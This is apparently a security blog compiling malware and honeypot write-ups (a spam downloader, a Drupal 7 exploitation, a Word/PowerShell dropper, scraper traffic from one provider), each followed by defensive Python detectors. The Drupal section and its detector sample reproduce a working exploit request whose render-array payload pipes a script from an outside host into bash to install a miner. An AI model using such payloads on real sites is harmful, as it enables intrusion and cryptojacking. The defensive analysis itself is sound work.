We follow the trail of another spam e-mail. It’s delivering a malware downloader that’s 0/63 on VirusTotal, not unheard of these days. The e-mail had a PDF attachment, SWIFT-MT103.pdf, which itself was innocuous and simply displayed a fuzzy scan image, purportedly a SWIFT request, that linked to a file hosted on Box.com.
Tactics of the downloader/dropper:
Contains functionality to read data from the clipboard
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Detected TCP or UDP traffic on non-standard ports
Sample file name is different from the original file name gathered from version info
Internet Provider seen in connection with other malware
Icon mismatch, PE includes an icon from a different legit application
Reads the hosts file
…and many other warning signs shown by the sandbox during deeper debugging, all included in the report.
A copy of the original e-mail received to a honeypot spam account:
Received: from vps39646.inmotionhosting.com (vps39646.inmotionhosting.com
Date: Tue, 12 Jun 2018 01:42:52 +0000
Download the attached PDF and examine it to find the link:
Download the file from the box.com link and unzip the contents:
Analysis of the dropper downloaded from this link:
We found an interesting hack using a Drupal 7.56 honeypot. The attacker used a specially crafted URL to pull down a JPEG image, which turned out to be a script. The script connects to a Monero mining pool and starts mining crypto from the server automatically. The vulnerability was exploited through curl in this version of Drupal.
Here’s all of the traffic from the attacker:
22.214.171.124 - - [24/Apr/2018:01:34:08 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 403 36607 "-" "Ruby"
126.96.36.199 - - [24/Apr/2018:02:00:41 +0000] "POST //?q=user/password&name[%23post_render]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 21915 "-" "Ruby"
188.8.131.52 - - [24/Apr/2018:02:00:42 +0000] "POST /?q=file/ajax/name/%23value/form-RR2WlQ5bBKZlJcllzKJ16U3bf-IU_aIP8ALAzixqPZw HTTP/1.1" 200 1931 "-" "Ruby"
The file logo7.jpg pulled down from gmicameroon.com site is a script that runs the miner in /var/tmp/suppoie running as www-data on the device:
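The three requests above are the whole attack: a Form API AJAX probe, then a request that smuggles a render-array callback (name[#post_render]=system) whose #markup value is a curl-to-bash pipeline. The following detector, an added example that is not code from the original post, walks an access log in the combined format, decodes each request target and flags exactly those patterns. The log lines are the ones reproduced above plus one constructed benign request; #pre_render, #lazy_builder and #access_callback are assumed to be further Drupal render-API callback keys of the same risk class and are not taken from the page.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample: the three requests from the honeypot log above, plus one
# ordinary login request to show that normal traffic is not flagged.
SAMPLE_LOG = r'''22.214.171.124 - - [24/Apr/2018:01:34:08 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 403 36607 "-" "Ruby"
126.96.36.199 - - [24/Apr/2018:02:00:41 +0000] "POST //?q=user/password&name[%23post_render]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 21915 "-" "Ruby"
188.8.131.52 - - [24/Apr/2018:02:00:42 +0000] "POST /?q=file/ajax/name/%23value/form-RR2WlQ5bBKZlJcllzKJ16U3bf-IU_aIP8ALAzixqPZw HTTP/1.1" 200 1931 "-" "Ruby"
203.0.113.10 - - [24/Apr/2018:02:05:00 +0000] "GET /user/login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'''

# Combined log format: ip ident user [time] "method target proto" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Render-array keys that Drupal treats as callbacks or raw markup. #post_render and
# #markup appear in the honeypot log; #pre_render, #lazy_builder and #access_callback
# are other Drupal render API callback keys (assumption: same risk class, not from the page).
RENDER_KEYS = {'#post_render', '#pre_render', '#lazy_builder', '#access_callback', '#markup'}
# A download piped straight into a shell, as in the #markup value above.
SHELL_RE = re.compile(r'\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b')


def analyze_request(target):
    """Return a list of findings for one request target (path plus query string)."""
    findings = []
    path, _, query = target.partition('?')
    decoded = unquote(target)
    # Form API AJAX probes address a form element through its #value path.
    if '#value' in decoded or 'element_parents=' in query:
        findings.append('ajax-form-probe')
    for key, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl percent-decodes, so name[%23post_render] arrives as name[#post_render]
        for inner in re.findall(r'\[([^\]]*)\]', key):
            if inner in RENDER_KEYS:
                findings.append(f'render-array-key:{inner}')
        if SHELL_RE.search(value):
            findings.append('shell-download-pipeline')
    return findings


def scan_log(text):
    """Return one record per flagged request; 'accepted' is True when the server returned 200."""
    flagged = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        findings = analyze_request(m['target'])
        if findings:
            flagged.append({'ip': m['ip'], 'status': int(m['status']),
                            'accepted': m['status'] == '200', 'findings': findings})
    return flagged


if __name__ == '__main__':
    for rec in scan_log(SAMPLE_LOG):
        print(rec)
```

The 'accepted' field is the part worth alerting on: the first probe drew a 403, but the request carrying the callback and the curl pipeline got a 200, which is the signal that the miner script was fetched and run rather than merely attempted.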
It all started with an e-mail from NYU:
Received: from mx5.nyu.edu (MX5.NYU.EDU [184.108.40.206])
"From: xxxx xxxx <firstname.lastname@example.org> Sent: Monday, April 2, 2018 9:36 AM To: Infostruction Subject: ACH Payment Advice Good Afternoon, Please double check the payment for April 02, I have attached the WIRE. Invoice 98914 was paid on 04.01.2018. I want to make sure we are both on the same page. hxxp://agridron.com/INVOICE/GH-622577/ Thank you for your business! xxxxx xxxx"
We analyzed the malicious document this website (220.127.116.11) dropped:
SHA-256: f12642b8eb36637abaa85adbd559d056c36e2e013ca8f429236cd1fe0609c56a
File name: WIRE-FORM-DA-280819104.doc
17 engines detected this file: VBA.Trojan-Downloader.Agent.cpw
File names included WIRE-FORM-DA-280819104.doc and ACH-FORM-GMU-89664246207.doc. As you may already know, these will change randomly. The doc launched cmd.exe, which launched PowerShell with an obfuscated script. It drops C:\Users\Public\183480.exe; the file connects to frameyourdreams.in, IP 18.104.22.168:443 (WEDOS-HOSTING CZ), 22.214.171.124:80 (Online SAS), 126.96.36.199:8080, and 188.8.131.52:4143 (OVH Hosting, Inc.).…
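The behaviour above (Word launching cmd.exe, cmd.exe launching PowerShell with an obfuscated script, and an executable dropped under C:\Users\Public) is a process-tree pattern an endpoint sensor can catch regardless of how the document or the script are obfuscated. The following is an added example, not code from the original post: it runs two checks over constructed Sysmon-style process and file events. The event field names, PIDs and the explorer/Word paths are my own assumptions; the dropped file path and document name are taken from the post, and the encoded script is a placeholder.

```python
import ntpath
import re

# Constructed Sysmon-style events (assumption: the field names are my own, not a real
# Sysmon schema). The chain reproduces what the post describes: the .doc opened in Word
# launches cmd.exe, which launches PowerShell with an encoded script, and the PowerShell
# process writes C:\Users\Public\183480.exe. The second cmd.exe, started from Explorer,
# is there to show that an ordinary shell is not flagged.
PROCESS_EVENTS = [
    {'pid': 4,    'ppid': 0,    'image': r'C:\Windows\explorer.exe',
     'cmdline': 'explorer.exe'},
    {'pid': 1820, 'ppid': 4,    'image': r'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE',
     'cmdline': r'"WINWORD.EXE" /n "C:\Users\victim\Downloads\WIRE-FORM-DA-280819104.doc"'},
    {'pid': 2264, 'ppid': 1820, 'image': r'C:\Windows\System32\cmd.exe',
     'cmdline': 'cmd /c powershell -nop -w hidden -enc <BASE64-PLACEHOLDER>'},
    {'pid': 2300, 'ppid': 2264, 'image': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
     'cmdline': 'powershell -nop -w hidden -enc <BASE64-PLACEHOLDER>'},
    {'pid': 3100, 'ppid': 4,    'image': r'C:\Windows\System32\cmd.exe',
     'cmdline': 'cmd /c dir'},
]
FILE_EVENTS = [
    {'pid': 2300, 'target': r'C:\Users\Public\183480.exe'},
    {'pid': 1820, 'target': r'C:\Users\victim\AppData\Local\Temp\~WRD0001.tmp'},
]

OFFICE = {'winword.exe', 'excel.exe', 'powerpnt.exe'}
SHELLS = {'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe'}
# PowerShell accepts abbreviated switches, so match the short forms as well as the long ones.
SUSPICIOUS_FLAGS = {
    'encoded-command': re.compile(r'(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?(?=\s)'),
    'hidden-window':   re.compile(r'(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b'),
    'no-profile':      re.compile(r'(?i)(?:^|\s)-nop(?:rofile)?\b'),
}


def basename(image):
    # ntpath handles Windows paths correctly even when this runs on Linux.
    return ntpath.basename(image).lower()


def ancestry(pid, procs, max_depth=16):
    """Image names from the process itself up to the root, e.g. ['cmd.exe', 'winword.exe', ...]."""
    chain = []
    while pid in procs and len(chain) < max_depth:
        chain.append(basename(procs[pid]['image']))
        pid = procs[pid]['ppid']
    return chain


def detect_office_spawn_chain(events):
    """Flag shells and script hosts that have an Office application anywhere in their ancestry."""
    procs = {e['pid']: e for e in events}
    alerts = []
    for e in events:
        if basename(e['image']) not in SHELLS:
            continue
        chain = ancestry(e['pid'], procs)
        if not any(p in OFFICE for p in chain[1:]):
            continue
        flags = [name for name, rx in SUSPICIOUS_FLAGS.items() if rx.search(e['cmdline'])]
        alerts.append({'pid': e['pid'], 'chain': ' -> '.join(reversed(chain)), 'flags': flags})
    return alerts


def detect_public_drop(file_events, process_events):
    r"""Flag executables written under C:\Users\Public, the world-writable path the dropper used."""
    procs = {e['pid']: e for e in process_events}
    alerts = []
    for f in file_events:
        target = f['target'].lower()
        if target.startswith(r'c:\users\public' + '\\') and target.endswith('.exe'):
            alerts.append({'pid': f['pid'], 'target': f['target'],
                           'chain': ' -> '.join(reversed(ancestry(f['pid'], procs)))})
    return alerts


if __name__ == '__main__':
    for a in detect_office_spawn_chain(PROCESS_EVENTS) + detect_public_drop(FILE_EVENTS, PROCESS_EVENTS):
        print(a)
```

Walking the full ancestry rather than only the direct parent matters here: PowerShell's parent is cmd.exe, not Word, so a parent-only rule would see a perfectly normal cmd.exe child and miss the chain.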
*** Update – 4/6/2018 – We’ve received 125,027 connections from this provider since the blog was posted. A block by ARIN name helps us cover more space, so OVH Hosting, Inc, and OVH SAS are completely blocked from our websites.
Why do Canadians love the Infostruction blog so much? This is a question I set out to answer after looking at our Web Application Firewall (WAF) logs over the past 48 hours, and beyond. I’ve got 60k connections from 39 different IPs that belong to OVH Hosting Inc, all hailing from Canada. I let them know about this issue back when it started, and blocked all of the networks owned by this company. Since then, it’s been a constant flood of connections from OVH, and no response from the security/abuse team. I don’t expect one, so I’m writing here to warn you: if you see a large amount of connections, we recommend blocking the IPs below at a minimum. The real problem comes with the volume, and the fact that they are relentless, never stopping to rest. These connections come 24x7x365, and look like some sort of crawler or scraper. The issue is they do not present a legitimate user agent for that kind of bot, and so we have no idea why they are accessing all of the content repeatedly, for days on end.…
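The signal described in this post is volume from a small cluster of addresses in one provider's space, combined with a browser-like user agent rather than a declared crawler. The following is an added example, not code from the original post: it aggregates constructed WAF log lines by source IP, flags addresses over a request threshold that never declare themselves as a bot, and collapses the flagged addresses into the enclosing netblocks so the block rule covers the range rather than single hosts. The 192.0.2.0/24, 198.51.100.0/24 and 203.0.113.0/24 ranges are documentation addresses standing in for real netblocks, and the threshold and /24 prefix length are assumptions to tune.

```python
import re
from collections import defaultdict
from ipaddress import ip_network, collapse_addresses

# Combined log format; only the source IP, request line and user agent are used here.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Declared crawlers identify themselves; the scraper described in the post does not.
DECLARED_BOT_RE = re.compile(r'(?i)bot|crawler|spider')


def build_sample():
    """Constructed sample: 60 requests from three hosts in one /24 with a browser UA,
    40 requests from a self-declared crawler, and one ordinary visitor."""
    lines = []
    for i in range(60):
        ip = f'192.0.2.{10 + i % 3}'
        lines.append(f'{ip} - - [05/Apr/2018:10:{i:02d}:00 +0000] "GET /blog/page/{i} HTTP/1.1" '
                     f'200 8192 "-" "Mozilla/5.0"')
    lines.append('203.0.113.5 - - [05/Apr/2018:11:00:00 +0000] "GET /blog/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0"')
    for i in range(40):
        lines.append(f'198.51.100.7 - - [05/Apr/2018:11:{i:02d}:00 +0000] "GET /blog/page/{i} HTTP/1.1" '
                     f'200 8192 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"')
    return '\n'.join(lines)


def find_scrapers(log_text, threshold=20):
    """Return {ip: {'requests', 'distinct_paths'}} for sources at or above the threshold
    that never presented a declared bot user agent."""
    counts = defaultdict(int)
    paths = defaultdict(set)
    declared = defaultdict(bool)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip = m['ip']
        counts[ip] += 1
        req_parts = m['req'].split(' ')
        paths[ip].add(req_parts[1] if len(req_parts) > 1 else m['req'])
        if DECLARED_BOT_RE.search(m['ua']):
            declared[ip] = True
    return {ip: {'requests': n, 'distinct_paths': len(paths[ip])}
            for ip, n in counts.items() if n >= threshold and not declared[ip]}


def summarize_blocklist(ips, prefix_len=24):
    """Collapse flagged addresses into their enclosing /prefix_len networks, deduplicated,
    so one rule covers the whole range instead of each host."""
    nets = {ip_network(f'{ip}/{prefix_len}', strict=False) for ip in ips}
    return [str(n) for n in collapse_addresses(nets)]


if __name__ == '__main__':
    flagged = find_scrapers(build_sample())
    for ip, stats in sorted(flagged.items()):
        print(ip, stats)
    print('block:', summarize_blocklist(flagged))
```

A declared bot user agent is a claim, not proof, so a production version would confirm it (reverse DNS or the operator's published ranges) before exempting a source; and the /24 collapse is the small-scale version of what the post does by blocking the provider's whole ARIN allocation.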